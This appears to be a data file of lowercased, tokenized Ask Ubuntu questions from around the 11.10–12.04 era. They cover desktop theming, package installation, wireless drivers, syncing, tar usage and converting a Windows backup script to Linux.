121387	how to theme the cinnamon desktop ?	i 've reading about about the cinnamon desktop through this q & a : how do i install the cinnamon desktop ? also i 've been reading these theming questions : difference between gtk theme and gnome shell theme ? how do i get and install more themes , icons , pointers for ubuntu ? i 'm trying to understand downloading & installing themes . i see that i can download gtk2 & gtk3 but i 'm unsure i understand the differences . i see there are themes such as unity themes , gnome-shell themes from websites such as gnome-look.org how do i apply these themes to cinnamon ? i 'm new to cinnamon so a beginners guide would be very useful .
121391	where are mysql-admin and query-browser ?	in terminal i run next commands : sudo apt-get install mysql-server sudo apt-get install mysql-admin sudo apt-get install mysql-query-browser with first command - all ok . but for latest two commands : unable to locate package . my question : why i ca n't install admin and query browser ?
121392	application compatability with the cinnamon desktop	i 've reading about about the cinnamon desktop through this q & a : how do i install the cinnamon desktop ? i 've also been looking at the various possible various flavours of ubuntu such as unity/gnome-shell and kde : how do i install kde shell on ubuntu ? how do i install and use the latest version of gnome shell ? my concern is about running applications on cinnamon - i 'm fairly new to linux and am unsure about running software - especially about potentially mixing different software that may have been targeted at different desktops . can i run a kubuntu or unity applications in cinnamon or do i have to get specific cinnamon only applications ? for example , koffice/libreoffice , okular/evince etc . any help understanding what potential impacts such as extra software i may need to use or additional configuration to make sure that various different software behave and look like each other would be gratefully received .
121397	dropbox syncing file.ext~ ( tilde , backup/temp )	when using dropbox in ubuntu everything seems fine , but on my windows machine with dropbox i end up with the file.ext~ backup/temp version of any files i opened in ubuntu . is there some way to prevent this ? i found several forum topics about this matter on the dropbox forum but they are all expired and unviewable . ( side note : why would you hide your forum 's aggregated knowledge ? )
121399	startup a ubuntu ftp and ssh server without logging in	i have a ubuntu server 11.10 box , which i would like to run `` headless '' , and without a keyboard , mouse or display . is it possible that immediately after startup the machine logs into an account , or allows me to control the machine from my windows 7 machine nearby via ssh and sftp ? i 've got openssh server installed , and even when the box is not logged in i can start an ssh session . i 've tried installing vsftpd but its very troublesome ( hardly connects ) and only starts when i login locally into the box .
121400	where are the shapes in libreoffice draw ?	i have n't been able to draw anything useful on libreoffice draw . where are the different shapes to make diagrams ? all i can find are basic shapes that i would find on microsoft word ( squares , circles , stars , arrows , etc ) . will i be able to make more elaborate diagrams like a data flow diagram or a basic uml diagram ?
121407	how to change the number of workspaces in unity ?	how to change the number of workspaces in unity without installing any other softwares like myunity or something like that ? i 'm running ubuntu 12.04 beta 2 .
121412	is there a way to keep the application switcher active on the screen all time ?	i like the way it works . i like the way it looks . it could be more better if i can keep the application switcher on screen all time , not only when pressing alt+tab , and switch apps using mouse click on it . is there a way to do it in a safe way ? i do n't want to use compiz settings wizard . is there a way doing it using dconf editor ? i feel it more safer . heres the image what i was indicating :
121413	undertanding .bashrc and .bash_profile	on a server when i login as root i see .bashrc ( ubuntu 10.10 ) . on my mac i have a .bash_profile , does ubuntu always have only a .bashrc file and not .bash_profile ? ( just confused so asking , i realize they are different o/s 's but maybe there is a relationship somehow ? ) on my server , i want to create an alias , should i put it in .bashrc ? what if i want this alias to be applied so all users can use it ?
121414	ubuntu 12.04 unity is running but does not appear correctly on virtual box	i am using the latest edition of virtualbox 4.1.12 and i get the attached when i attempt to launch unity . everything is running in the background but it 's not displaying the launcher , dash , or panel . just a long line at the top of the screen . i 've tried to reboot the vm as well as ensure all updates are installed . i 've also tried removing and reinstalling the guest additions . see screenshot below : please note that the possible duplicate does not describe the same problem . that fix is not appropriate as unity is in this case actually running but not displaying properly .
121415	very long boot up with ubuntu 10.04.4	i installed ubuntu 10.04.3 on atom . then i do the update and upgrade with : # apt-get update # apt-get upgrade # apt-get dist-upgrade the system can boot up now but in almost 2 minutes . after power on and system test , it will stop at `` verifying dmi pool data '' for 10 seconds before the grub menu comes up . then after the choosing of one item , to the start up of os there is 100 seconds of black screen . the start up after that is normal and the operations in the system is also normal . i am concerned with if it is of hardware problem , or just some problem with the kernel . also i want to know after `` verifying dmi pool data '' what is done ? and after we choose an item in grub menu , what does the system do ? and where can i see the procedure of the whole boot up ? the /var/log/boot.log is too simple , and this is it : fsck from util-linux-ng 2.17.2 fsck from util-linux-ng 2.17.2 /dev/mmcblk0p5 : clean , ... ... /dev/mmcblk0p1 : clean , ... ... * starting apparmor profiles skipping profile in /etc/apparmor.d/disable : usr.bin.firefox ok ] * setting sensors limits ok ]
121423	running ms access programs	i have an old program developed in ms access and would like to convert it to kexi somehow . the program on windows is launched with access . is there any way that kexi can launch this program ? i know my way around ubuntu and the terminal , but not well versed on databases . once you make something in kexi how do you `` run '' it or `` view '' what you 've made ? so far i am able to import the mdb file into kexi and see all of the database data , but that is as far i have gone . the program was made by a relative years ago for my dad . i myself am an ubuntu only user for 6+ years now and have no intentions to touch windows and am looking for a linux solution . my dad is also an ubuntu user , hence why im looking for a solution . if kexi can not launch and run an mdb file , what else can i try ? anything browser based ? any tips or direction would be extremely helpful . i spoke to my brother who originally made the program . i told him about kexi and here is what he said . does any of this make sense ? thanks . this is how i would try to get them to work : stand alone setup - after import , look for an option where you designate which form object you want to open upon startup . it might be in the tools tab in the picture below . after you save that change , it re-start it and it should work . front end/back end setup - do what i suggested for the stand alone setup to the > `` front-end '' mdb file . after you do that , put the other file ( table mdb file ) where you > want it to reside on the network . now , open back up the `` front end '' file and look for > an option that will allow you to `` connect '' to those tables in the other file . it looks > like it could be in the `` external data '' tab in the picture below . for this setup , you > may need to do these two tasks in the reverse order i just mentioned . thanks ! fred
121425	vpn default route issue when using the ui	when setting up a vpn connection using the ui ( system settings = > network ) the vpn connection is used as the default route after connecting to it . how can i avoid this ? that is without assigning manual addresses . i want the connection to use dhcp . it should use the eth* interfaces for my default route , like they are used before making the connection . the vpn route should only be used when connecting to addresses in the ppp0 adapters range . if possible using the gui only , not that i 'm not used to editing config files ... i tried setting the `` method '' combobox in the `` configure ... '' dialogue to `` automatic ( vpn ) addresses only '' . that does n't make a difference . ( another thing i noticed ; the ui shows my connection as a `` wireless connection '' in the list control on the left . do n't know why ... it has the right icon , but that 's probably something for the bug tracker . )
121426	no banshee notification area icon in gnome 3 classic session	after installing ubuntu 12.04 , i have a problem with banshee : it does n't have a tray icon . i know about the tray-icon-plugin , but it 's not working : i 'm using gnome 3 in classic mode . in gnome-shell banshee has an icon . how can i get the tray-icon to work in a classic session ?
121427	grub appears to using the kernel insmod , is this possible ?	i am trying to learn the gnu/ubuntu-linux in a detailed way . i was reading 00_header , which run first when grub loads , and i saw for i in $ { grub_preload_modules } ; do echo `` insmod $ i '' done as i know , insmod is a module loader used by kernel . if the grub is running ; there must be no kernel loaded . how can this code run ? thanks for any replies .
121428	do changes made on gnome classic affect ubuntu desktop ?	at my logon panel i can see these : gnome , gnome classic , ubuntu , ubuntu 2d . i want to know if any change i made on gnome classic will affect ubuntu ? actually i intend to install some kool gnome classic theme and wish to not to use some apps as they are showing broken or look ugly ( eg . panel tint2 ) . i 'm on ubuntu 11.10 oneiric .
121430	how to configure unity/compiz in 12.04 so that update manager opens maximized w/screen bigger than 1024ă600 ?	in precise , window auto-maximize is disabled on monitors with a resolution above 1024 ă 600 [ 1 ] . i have a bigger resolution , but i prefer maximized windows anyway . i want update manager to start maximized . what i 've tried so far : in compiz config settings manager , i have place windows activated and 'windows with fixed placement mode ' has windows matching the rule `` ( name=gnome-terminal ) | ( name=update-manager ) '' set to 'maximize ' . with this , gnome terminal starts maximized , update manager does not . in compiz config settings manager , i have set a window rules [ 2 ] rule to match `` name=update-manager '' . irregardless of any rules set or not , activating window rules results in not being able to bring out unity launcher anymore , alt+tab window switching becoming slow or nonfunctional entirely and the screen sporadically freezing completely . not a viable option apparently . i 've installed maximus [ 3 ] and started it . update manager ignores it ( or vice versa ) . i 've not tried devilspie and would prefer not to . having to configure something external for this would seem stupidly redundant with ( the no-brainer ) maximus and all these compiz options already available . i just ca n't seem to make them work . edit : for some time now , i 've had the 2nd solution above ( window rules ) in use , and the unity-related problems have no longer manifested themselves ; apparently the related bugs have been fixed ( although i 've only found one expired bug from launchpad that seems to describe the issues i had [ 4 ] ) . i 'm therefore closing this . [ 1 ] https : //bugs.launchpad.net/ayatana-design/+bug/797808 [ 2 ] http : //askubuntu.com/a/53657/34756 [ 3 ] how to configure my system so that all windows start maximized ? [ 4 ] https : //bugs.launchpad.net/ubuntu/+source/compiz/+bug/786332 # yui_3_10_3_1_1393236486196_51
121435	have the kubuntu backports ppa stable software ?	i would like to update my kde desktop . i am using kubuntu 11.10 with kde 4.7 , but i would like to install kde 4.8 . i think that i have to add tne next ppa : kubuntu-ppa/backports , and then run sudo apt-get dist-upgrade . is the software in this ppa stable ? if so , why is not a default repository ? can i trust this ppa ? thanks . ariel
121438	can not boot after installing ubuntu on lenovo x120e	i have installed ubuntu 11.10 on my x120e using amd64 alternate iso image . the installation went fine , but it is having issues while booting after a successful installation , it says - `` no operating system found '' . i followed the instruction at - help.ubuntu.com/community/x120e # installation to purge grub-efi and installed grub-pc , even then i could n't boot into ubuntu . ( got the same `` no operating system found '' ) this is the file from boot-repair with this setup - http : //pastebin.ubuntu.com/926556/ then i asked in # ubuntu and they suggested me to create a bios-boot partition , i was not very comfortable with the solution they had suggested but gave it a try anyhow . i re-sized my initial partition and made 4 mb free space in the beginning of the partition and had set the flag bios_grub . re-installed ubuntu 11.10 this time using amd64 desktop iso image file . installation went fine as before but finally this time also the system did n't boot , it gave the same - `` no operating system found '' message . in bios i have the settings as to use both ( legacy and uefi ) and with uefi tried first . this is the boot-repair file from my latest setup - http : //pastebin.ubuntu.com/926761 any help/suggestions are appreciated .
121449	is there a way to have only controllers in totem ?	what i want is to have only controllers without video window . is it possible ?
121454	how to change the icon size and default behaviour of ubuntu software center on ubuntu 11.10 ?	im having a peculiar problem with ubuntu software center . see this image . it will explain you the problem .
121456	how to convert my backup.cmd into something i can run in linux ?	back in the day when i was using windows ( and a noob at everything it ) i liked batch scripting so much that i wrote a lot of them and one i am pretty proud of that is my backup.cmd ( see below ) . i am pretty basic with the linux bash sudo/apt-get/sl/ls/locate/updatedb/etc ... i do n't really know the full power of the terminal . if you see the code below can i get it to work under ( ubuntu ) linux : ) by rewriting some of the windows code with the linux equivalent ( btw : this works under xp/vista/7 | dutch/english ) @ echo off title back it up : home cls echo éíííííííííííííííííííííííííííííííííííííííííííííííííííííí» echo º º echo º typ a/b for the options º echo º º echo ìíííííííííííííííííííííííííííííííííííííííííííííííííííííí¹ echo º º echo º `` a '' =backup options º echo º º echo º `` b '' =harddisk options º echo º º echo º º echo èííííííííííííííííííííííííííííííííííííííííííííííííííííííœ set /p selection=choose : goto % selection % : a cls echo éíííííííííííííííííííííííííííííííííííííííííííííííííííííí» echo º º echo º typ 1 to start that backup º echo º º echo ìíííííííííííííííííííííííííííííííííííííííííííííííííííííí¹ echo º º echo º `` a '' =backup options º echo º è1=documents , pictures , music , videos , downloads º echo º º echo º `` b '' =harddisk options º echo º º echo èííííííííííííííííííííííííííííííííííííííííííííííííííííííœ set /p selection=choose : goto % selection % : b cls echo éíííííííííííííííííííííííííííííííííííííííííííííííííííííí» echo º º echo º typ hd to start the disk check º echo º º echo ìíííííííííííííííííííííííííííííííííííííííííííííííííííííí¹ echo º º echo º `` a '' =backup options º echo º º echo º `` b '' =harddisk options º echo º èhd=find and repair bad sectors º echo º º echo èííííííííííííííííííííííííííííííííííííííííííííííííííííííœ set /p selection=choose : goto % selection % :1 cls if exist `` % userprofile % \desktop '' ( set desk=desktop ) else ( set desk=bureaublad ) if exist `` % userprofile % \documents '' ( set docs=documents ) else ( set docs=mijn documenten ) if exist `` % userprofile % \pictures '' ( set pics=pictures ) else ( echo cant find % userprofile % \pictures ) if exist `` % userprofile % \music '' ( set mus=music ) else ( echo cant find % userprofile % \music ) if exist `` % userprofile % \videos '' ( set vids=videos ) else ( echo cant find % userprofile % \videos ) if exist `` % userprofile % \downloads '' ( set down=downloads ) else ( echo cant find % userprofile % \downloads ) cls echo . examples ( d : \ ) ( d : \backup ) ( d : \backup\18-4-2011 ) echo . echo . if there is no `` d : \backup '' folder then the folder will be created echo . set drive= set /p drive=storage : echo start > > backup.log echo name : % username % > > backup.log echo date : % date % > > backup.log echo time : % time % > > backup.log echo ======================================== % docs % =========================================== > > backup.log echo % docs % echo source : '' % userprofile % \ % docs % '' echo destination : '' % drive % \ % username % \ % docs % '' echo % time % > > backup.log xcopy `` % userprofile % \ % docs % '' `` % drive % \ % username % \ % docs % '' /e /i > > backup.log echo 20 % % cls echo ======================================== '' % pics % '' ========================================= > > backup.log echo `` % pics % '' echo source : '' % userprofile % \ % pics % '' echo destination : '' % drive % \ % username % \ % pics % '' echo % time % > > backup.log xcopy `` % userprofile % \ % pics % '' `` % drive % \ % username % \ % pics % '' /e /i > > backup.log echo 40 % % cls echo ======================================== '' % mus % '' ========================================= > > backup.log echo `` % mus % '' echo source : '' % userprofile % \ % mus % '' echo destination : '' % drive % \ % username % \ % mus % '' echo % time % > > backup.log xcopy `` % userprofile % \ % mus % '' `` % drive % \ % username % \ % mus % '' /e /i > > backup.log echo 60 % % cls echo ======================================== '' % vids % '' ======================================== > > backup.log echo % vids % echo source : '' % userprofile % \ % vids % '' echo destination : '' % drive % \ % username % \ % vids % '' echo % time % > > backup.log xcopy `` % userprofile % \ % vids % '' `` % drive % \ % username % \ % vids % '' /e /i > > backup.log echo 80 % % cls echo ======================================== '' % down % '' ======================================== > > backup.log echo `` % down % '' echo source : '' % userprofile % \ % down % '' echo destination : '' % drive % \ % username % \ % down % '' echo % time % > > backup.log xcopy `` % userprofile % \ % down % '' `` % drive % \ % username % \ % down % '' /e /i > > backup.log echo end > > backup.log echo % username % % date % % time % > > backup.log echo 100 % % cls echo backup compleet copy `` backup.log '' `` % drive % \ % username % '' del `` backup.log '' pushd `` % drive % \ % username % '' echo close backup.log to continue with backup script '' backup.log '' echo press any key to retun to the main menu pause > nul goto : home : hd echo finds and repairs bad sectors echo typ in harddisk letter ( c : d : e : ) set hd= set /p hd=hard disk : chkdsk % hd % /f /r /x pause goto : home
121462	intel graphics board does n't run great at ubuntu . help me ?	it 's my first ask here , so sorry for something ... i have a notebook ( 3gb ram , core 2 duo @ 2,1ghz , intel graphics 4 1gb onboard ) and when i open more than 3 , 4 softwares , and try to alternate between them , using the `` super + w '' , i got some legs and low performance . sometimes the unity crash and restart because . while watching some videos on youtube , and open the dash , the `` transparency '' behind dash looks very legged , sometimes the image freeze behing the dash layer . when i was a windows 7 user , i could open 10 softwares and alternate between 'em using `` super = tab '' without any troubles . i was able to play burnout paradise , a heavy game , with aero turned on ! this way i believe this trouble is with the default driver came with ubuntu 11.10 ( and 12.04 ) . while using ubuntu 10.10 , this did n't happien . so , my question is ... . is there some driver i can download to improve my video 's board speed ? can i do something ? p.s . = i prefer the workflow unity , it 's easier , prettier and agiler than windows 7 ui p.s . 2 = sorry about my bad english , i 'm brazilian , and here just about 5 % can speak english . `` i did n't use google translator : p ) thanks for the answers : d god blesses you !
121465	how to change the scroll bar style in unity ?	i do n't feel unity overlay scroll bar is comfortable . what should i do in order to get the old-style scroll bar . please do n't suggest me to install some theme pack or something like that . or is there any command or a setting to restore the old-style scroll bar ?
121468	how to play shockwave flash ?	is there any workaround for adobe shockwave flash , i mean a plugin for firefox , totem or something like that . is there any clone of shockwave flash in ubuntu . i found that in the official adobe site that shockwave flash is not supported for linux platforms . while browsing the questions in this site i found this topic : compatible version of `` adobe shockwave player ? '' kind request : please do n't merge the topic with the one mentioned above . i 'm asking you people about playing .swf without using wine or any other microsoft windows compatibility layer softwares but is there any way to play .swf without using softwares that run due to compatibility programs like wine , playonlinux etc . i 'm running ubuntu 12.04 beta 2 .
121471	how can i change the wiggle time of 'urgent animation ' in unity launcher ?	i really like wiggle animation for application notification , but i find it disappear too quickly and i wish i could change this delay . i looked through all the ccsm , appearance , and myunity settings and nothing seems appropriate .
121474	permanently change keyboard layout	i am using xmonad and lxde , so i do n't want to use gnome-settings-daemon . but there is a problem - without it i can not switch into or type in cyrillics . i found some temporary solution - when i enter sudo dpkg-reconfigure keyboard-configuration and click through config menu , i end with right layout . but after i reboot system it disappears and i am forced to reconfigure it again . is there a way to make this changes permanent ?
121475	is there a gtk+3 version of the old default human theme ?	i came across how do i install wallpapers from older releases ? , and i was wondering if i could somehow get a gtk+3 version of the old human theme used prior to 10.04 lts to complete the retro look on 11.10 and later .
121478	program to cascade/tile windows	i have perhaps ten or fifteen windows open . i 'd like a program which automatically resizes all the windows and arranges them in columns and rows across the screen ( a grid formation ) , automatically figuring out the largest size for the windows so that they still fit . this is n't an `` expose '' type program - i want the windows to stay resized . i am using openbox to do my window management and am otherwise happy with it , i do n't want to find a whole new window manager just to solve this problem . the program tile is almost perfect , but it does n't know how to lay the windows out in a grid formation . any thoughts ? thanks !
121486	how to rename ubuntu one folders ? locked by syncdaemon ?	tl ; dr : does ubuntu one detect renamed synced folders ? i 'm trying to rename a large synced folder ( 'sync locally ' checked ) outside of ubuntu one , but still inside the home folder on windows . attempting to do so results in an error message : can not rename foldernamehere : it is being used by another person or program . close any programs that might be using the file and try again . quitting ubuntuone-syncdaemon and renaming results in ubuntu one not finding the synced folder ( folder in ubuntuone-control-panel-qt becomes grayed out ) . ticking 'sync locally ' again causes ubuntu one to begin downloading the synced folder with it 's old name and ignoring the renamed folder . is there any way to locally rename a synced folder short of reuploading the entire folder under a new name ? thanks for the help !
121487	atheros ar9485 wireless card does n't work in an asus k53e	i just installed ubuntu 11.10 32-bit version in dual boot mode on an asus k53 . every thing seems to work fine except for the wireless . the wireless works on windows 7 . ubuntu finds the wireless card , but it does not appear to be turned on . the only physical means of turning on the card is the fn-f2 key combo . that works on windows , but not in ubuntu . i 've looked in the forums for a solution and i 'm not quite sure what to do . i 've gathered the following information : jdwbmc @ spatha : ~ $ cat /etc/lsb-release ; uname -a distrib_id=ubuntu distrib_release=11.10 distrib_codename=oneiric distrib_description= '' ubuntu 11.10 '' linux spatha 3.0.0-12-generic # 20-ubuntu smp fri oct 7 14:50:42 utc 2011 i686 i686 i386 gnu/linux jdwbmc @ spatha : ~ $ lspci -nnk | grep -ia2 net 02:00.0 network controller [ 0280 ] : atheros communications inc. ar9485 wireless network adapter [ 168c:0032 ] ( rev 01 ) subsystem : azurewave device [ 1a3b:1186 ] kernel driver in use : ath9k -- 04:00.0 ethernet controller [ 0200 ] : atheros communications ar8151 v2.0 gigabit ethernet [ 1969:1083 ] ( rev c0 ) subsystem : asustek computer inc. device [ 1043:1851 ] kernel driver in use : atl1c jdwbmc @ spatha : ~ $ lsusb bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 001 device 003 : id 058f : a014 alcor micro corp. jdwbmc @ spatha : ~ $ iwconfig lo no wireless extensions . eth0 no wireless extensions . wlan0 ieee 802.11bgn essid off/any mode : managed access point : not-associated tx-power=0 dbm retry long limit:7 rts thrff fragment thrff power managementff jdwbmc @ spatha : ~ $ rfkill list all 0 : phy0 : wireless lan soft blocked : no hard blocked : no 1 : asus-wlan : wireless lan soft blocked : no hard blocked : no jdwbmc @ spatha : ~ $ lsmod module size used by parport_pc 32114 0 ppdev 12849 0 snd_hda_codec_hdmi 31426 1 bnep 17923 2 rfcomm 38408 0 bluetooth 148839 10 bnep , rfcomm snd_hda_codec_realtek 254125 1 binfmt_misc 17292 1 joydev 17393 0 asus_nb_wmi 12469 0 asus_wmi 19333 1 asus_nb_wmi sparse_keymap 13658 1 asus_wmi uvcvideo 67271 0 videodev 85626 1 uvcvideo snd_hda_intel 24262 2 snd_hda_codec 91754 3 snd_hda_codec_hdmi , snd_hda_codec_realtek , snd_hda_i ntel snd_hwdep 13276 1 snd_hda_codec snd_pcm 80468 3 snd_hda_codec_hdmi , snd_hda_intel , snd_hda_codec snd_seq_midi 13132 0 wmi 18744 1 asus_wmi snd_rawmidi 25241 1 snd_seq_midi snd_seq_midi_event 14475 1 snd_seq_midi snd_seq 51567 2 snd_seq_midi , snd_seq_midi_event arc4 12473 2 i915 505108 3 snd_timer 28932 2 snd_pcm , snd_seq snd_seq_device 14172 3 snd_seq_midi , snd_rawmidi , snd_seq ath9k 112711 0 psmouse 73673 0 serio_raw 12990 0 mac80211 272785 1 ath9k drm_kms_helper 32889 1 i915 ath9k_common 13599 1 ath9k drm 192226 4 i915 , drm_kms_helper ath9k_hw 293893 2 ath9k , ath9k_common ath 19387 2 ath9k , ath9k_hw cfg80211 172392 3 ath9k , mac80211 , ath snd 55902 14 snd_hda_codec_hdmi , snd_hda_codec_realtek , snd_hda_i ntel , snd_hda_codec , snd_hwdep , snd_pcm , snd_rawmidi , s nd_seq , snd_timer , snd_seq_device soundcore 12600 1 snd snd_page_alloc 14115 2 snd_hda_intel , snd_pcm mei 36466 0 i2c_algo_bit 13199 1 i915 video 18908 1 i915 lp 17455 0 parport 40930 3 parport_pc , ppdev , lp ahci 21634 3 libahci 25727 1 ahci atl1c 36638 0 xhci_hcd 72915 0 jdwbmc @ spatha : /var/lib/networkmanager $ cat networkmanager.state [ main ] networkingenabled=true wirelessenabled=true wwanenabled=true wimaxenabled=true jdwbmc @ spatha : ~ $ lspci -nn | grep 0280 02:00.0 network controller [ 0280 ] : atheros communications inc. ar9485 wireless network adapter [ 168c:0032 ] ( rev 01 ) any help would be appreciated . thanks .
121489	what has changed in libssl.0.9.8o-7ubuntu2 so that it now breaks my aventail client , and what should i do ?	i can not install my aventail client in kubuntu 12.04 because it does not like 12.04 's version of libssl.0.9.8 . although aventail will install without complaining when libssl.0.9.8o-7ubuntu1 is installed , it 's a different story with libssl.0.9.8o-7ubuntu2 , the version that 12.04 wants to install . with 0.9.8o-7ubuntu2 , i get the following errors : code : linux-gate.so.1 = > ( 0xb77c7000 ) libpthread.so.0 = > /lib/i386-linux-gnu/libpthread.so.0 ( 0xb7798000 ) libssl.so.0.9.7 = > not found libcrypto.so.0.9.7 = > not found libm.so.6 = > /lib/i386-linux-gnu/libm.so.6 ( 0xb776b000 ) libc.so.6 = > /lib/i386-linux-gnu/libc.so.6 ( 0xb75c5000 ) /lib/ld-linux.so.2 ( 0xb77c8000 ) what has changed between 0.9.8o-7ubuntu1 and 0.9.8o-7ubuntu2 ? is there a way for me to instruct my package management systems not to include libssl.0.9.8 in its updater ?
121491	is it possible to sync two computers without storing the files on a server ?	i have a family member currently using windows live mesh to sync a relatively large amount of files between computers . it is way over the ubuntu one 5 gb limit and the live mesh 2 gb limit . however , live mesh gives him the options of syncing all the data he wants without storing it on microsoft 's servers . does ubuntu one have an equivalent option , performing just the sync computer-to-computer and not computer-to-server and server-to-computer ? do you have other recommendations ? it does not necessarily have to be ubuntu one , but i need it to be cross platform , working across windows and ubuntu . we also have computers outside of uour home network we need to sync to . this is one of the few things keeping him from switching to ubuntu , and i 'd be very grateful for any help .
121503	do ppas freeze ever ?	say someone wants to get involved , but they want it to work properly for mass consumption first instead of a 'works for me ' attitude . starting one before 12.04 goes stable could be difficult with all the packages changing quite rapidly ( zeitgeist is a great example , but it 's all for the better ) . the question , is it safe to wait or does ppa creation freeze ?
121504	flash audio problem ; redirecting to pulse ?	i am having a problem where the sound on flash objects other than youtube videos are giving a strange distortion . it has a high pitched pulse sound every second or less that resembles skips on a record . i have no idea what the problem is or how to fix it . does anyone have an idea what i could do to fix this ? i am running xubuntu 11.10 . i think i might have redirected everything to pulse using a config file but i can not seem to find it anywhere . it used the lines 'type pulse ' in it . if anyone knows what i am talking about and how to find that file or whether or not it has any relevance i would greatly appreciate it . edit : i solved it . the problem was that i needed to update the flash plugin in chrome and chromium manually .
121508	compizconfig grid does n't work under ubuntu as virtual machine	i have installed ubuntu 11.10 as virtual machine within mac . i have installed vm tools . the approach in this link of compizconfig grid , which worked in my previous laptop where ubuntu was not a virtual machine , does not work anymore . i set some shortcut , but no action is launched ... does anyone know why ? the major functionality i need from grid is tiling windows to left/right side of the screen ... does anyone know any alternative ? ps : i have tried other plugins of compizconfig , for instance , move window works ... edit1 : the desktop environment i am using is ubuntu , not gnome . the unity is 2d instead of 3d . it is not a problem for me to change it if that can solve the grid or tiling problem above . edit2 & 3 : i did n't know that unity2d does not use compiz by default ... after installing gtk2-engines-pixbuf , i launched compiz -- replace & in a terminal , that gives : and i tried grid once again : bind shortcut < control > < alt > g to put left , it still does not work . but as i said before , if i bind < control > < alt > g to initiate window move in move window ( either before or after compiz -- replace & ) , the shortcut always has an effect ... edit 4 : i just enabled accelerate 3d graphics , which was disabled before ... but rerunning compiz -- replace & in a terminal gives exactly same message as before including 2 fatal for opengl .
121509	invisible file ?	everytime , after having started my computer , i get the following notification : the file p ( long number ) .mov is being uploaded to you personal cloud . does anybody know what this means ? i can not find such a file in my folder . cheers ! corina
121510	using tar , the entire folder structure is including , i do n't want that	i am taring a folder and for some reason the entire directory structure that preceds the folder i am tarring is included . i am doing this in a script like : 'tar czf ' + dir + '/asdf.tgz ' + dir + 'asdf/' where dir is like : /downloads/archive/ in the man pages , i see i can fix this but i ca n't get it to work . i tried : tar czf -c dir ... but now i have some kind of a file -c in my folder ( which i ca n't seem to delete btw ! ) . please help !
121515	setting up roaming profiles	i am trying to set up roaming profiles on ubuntu server . my goal is to be able to log on to the server from any computer in my house running ubuntu , and have the profile for the user i logged in as loaded onto that computer . what is the easiest way to accomplish this ?
121517	lost the system tray-bar and side panel dockbar disappears when touched	i have complete confidence that this problem will be resolved by restarting , however , it seems very odd that it should disappear randomly during my session . to put it simply , i 've lost the top tray-bar and the side panel disappears when the mouse moves within touch , however if it click and drag the window by the side it comes back ( but disappears instantly when touched again ( however i can still click on the buttons where they should be ) . the only guess i have as to why it 's happened is a bug , or i 've lost a file these gui things depend on . this is a real pain as some applications now have lost the `` file , edit '' menu items as a result of this .
121519	precise pangolin wo n't install	i 've been an ubuntu user since first release but now i ca n't install precise beta 2 32bits and neither 64 . tried so many times , already download nighly isos but nothing . 11.10 installs smoothly ( usint it ) . my hardware is a samsung notebook 4gb of ram.. , 25 gb partition for precise . i 'm gon na tell you what actually happens ... i boot from usb driver and i choose my language ( portuguese - brazilian ) choose partition till there everything is normal . but when i put my name user and password and give next the screen to choose my region appears a click next again and at this point i get stuck ! ! ! nothing happens . i 've waited for hours and all the system freezes . when i try to reboot , , my grub is gone . thanks for the help .
121524	where can i find books or articles about iptables and apparmor ?	where can i find a book or articles that doesnt tell me how to do a ls . im looking for one where i can learn about : -iptables -apparmor i know there is ufw and gufw and no gui for app armor . i want to learn iptables because i have a debian server and i dont think i can install ufw on it . thanks for reply .
121528	how to get autocad working with wine ?	i am trying 3 years now installing autocad , *3ds max* and revit architecture on ubuntu with wine ! every year i am very optimistic 'cause i see the new wine versions already improved . so , now i am starting again in a clean ubuntu installation to install autocad 2013 with wine 1.4 . i am not trying to have an answer only for me , but i want this community to try and finally we can achieve that ! the winetricks have already net framework 4 to install which is the reason i have not already ran to the past autocad . so , i would like to remove completely my windows 7 partition from my pc and go on a linux machine without loosing the powerfull architectural programms.i know all about blender and staff so i just want you to help find a solution on that , because i know there is a solution ! maybe i will have to learn all the c++ or python etc . but i am sure that a solution can come with the help of all of us ! any suggestion about this problem will be very nice and helpfull .
121529	how do i know if i 'm getting the most out of my video card ?	my computer at home is a bit lacking , so i want to make sure i 'm getting the most out of it while i can . generally speaking , here are the specs : 4gb memory amd athlon ( tm ) 64 x2 dual core processor 5200+ ă 2 64-bit ubuntu the terminal shows me the following : me @ home : ~ $ uname -a linux home 3.0.0-17-generic # 30-ubuntu smp thu mar 8 20:45:39 utc 2012 x86_64 x86_64 x86_64 gnu/linux me @ home : ~ $ lspci | grep vga 01:00.0 vga compatible controller : ati technologies inc rv380 [ radeon x600 ( pcie ) ] me @ home : ~ $ sudo lshw -c video *-display:0 description : vga compatible controller product : rv380 [ radeon x600 ( pcie ) ] vendor : ati technologies inc physical id : 0 bus info : pci @ 0000:01:00.0 version : 00 width : 32 bits clock : 33mhz capabilities : pm pciexpress msi vga_controller bus_master cap_list rom configuration : driver=radeon latency=0 resources : irq:44 memory : e0000000-efffffff ioport : ac00 ( size=256 ) memory : fdef0000-fdefffff memory : fdec0000-fdedffff *-display:1 unclaimed description : display controller product : rv380 [ radeon x600 ] vendor : ati technologies inc physical id : 0.1 bus info : pci @ 0000:01:00.1 version : 00 width : 32 bits clock : 33mhz capabilities : pm pciexpress bus_master cap_list configuration : latency=0 resources : memory : fdee0000-fdeeffff me @ home : ~ $ lspci -nn | grep vga 01:00.0 vga compatible controller [ 0300 ] : ati technologies inc rv380 [ radeon x600 ( pcie ) ] [ 1002:5b62 ] the additional drivers menu in system settings shows me nothing useful and my attempt at installing ati 's catalyst control center ( drivers that came with the video card ) failed . i believe the latest version of ubuntu at the time was 9.x . what should i do ? install an old version of ubuntu 9 ? use some alternative driver ? update : i might try my hand at a bit from this answer next : `` installing catalyst manually ( from amd/ati 's site ) '' . from a terminal , fgl_glxgears returns the following : fgl_glxgears : command not found update : per @ william 's question , here is some additional output : me @ home : ~ $ sudo apt-get install fglrx [ sudo ] password for blong : reading package lists ... done building dependency tree reading state information ... done the following packages were automatically installed and are no longer required : libkrb5-3 : i386 libk5crypto3 : i386 liblcms1 : i386 libcupsimage2 : i386 libidn11 : i386 xserver-xorg-video-r128-dbg libgnutls26 : i386 libtasn1-3 : i386 libfreetype6 : i386 libavahi-common-data : i386 libcups2 : i386 libkrb5support0 : i386 libgcrypt11 : i386 libkeyutils1 : i386 libjasper1 : i386 libavahi-client3 : i386 xserver-xorg-video-mach64-dbg libfontconfig1 : i386 libgssapi-krb5-2 : i386 